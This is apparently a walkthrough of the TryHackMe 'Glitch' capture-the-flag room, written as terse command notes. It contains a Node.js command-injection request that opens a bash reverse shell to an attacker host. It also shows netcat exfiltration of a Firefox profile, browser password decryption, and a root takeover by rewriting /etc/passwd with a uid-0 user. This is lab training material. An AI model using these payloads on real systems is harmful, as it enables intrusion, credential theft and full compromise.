Room Link: https://tryhackme.com/room/glitch
Initial Scan
Kali
Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
TCP/80 - HTTP
Looking into api directory we find a items page
Kali
gobuster dir -u http://$VICTIM/api -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Change the request from GET to POST and it gives an interesting message
Running the below shows it is vulnerable
Initial Shell
Kali
Burp
POST /api/items?cmd=require("child_process").exec('bash+-c+"bash+-i+>%26+/dev/tcp/$KALI/1337+0>%261"') HTTP/1.1
Host: 10.10.22.153
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: token=value
Upgrade-Insecure-Requests: 1
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Lateral Movement
Victim
tar -cvf backup.tar.gz .firefox/
Netcat
Kali(receiving)
nc -l -p 1234 > backup.tar.gz
Victim(sending)
nc -w 3 $KALI 1234 < backup.tar.gz
Kali
tar xvf backup.tar.gz
git clone https://github.com/unode/firefox_decrypt.git
python3.9 firefox_decrypt/firefox_decrypt.py .firefox/
Victim
su v0id
Password: love_the_void
Victim
find / -perm -u=s -type f 2> /dev/null
Victim
/usr/local/bin/doas -u root cat /root/root.txt
Privilege Escalation
I used doas to read the passwd file, make a backup called passwd.old just in case it broke and passwd.new and added a new user
Victim
/usr/local/bin/doas -u root cat /etc/passwd
vi /tmp/passwd.new
new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
/usr/local/bin/doas -u root cp /tmp/passwd.new /etc/passwd
su new
Password: 123
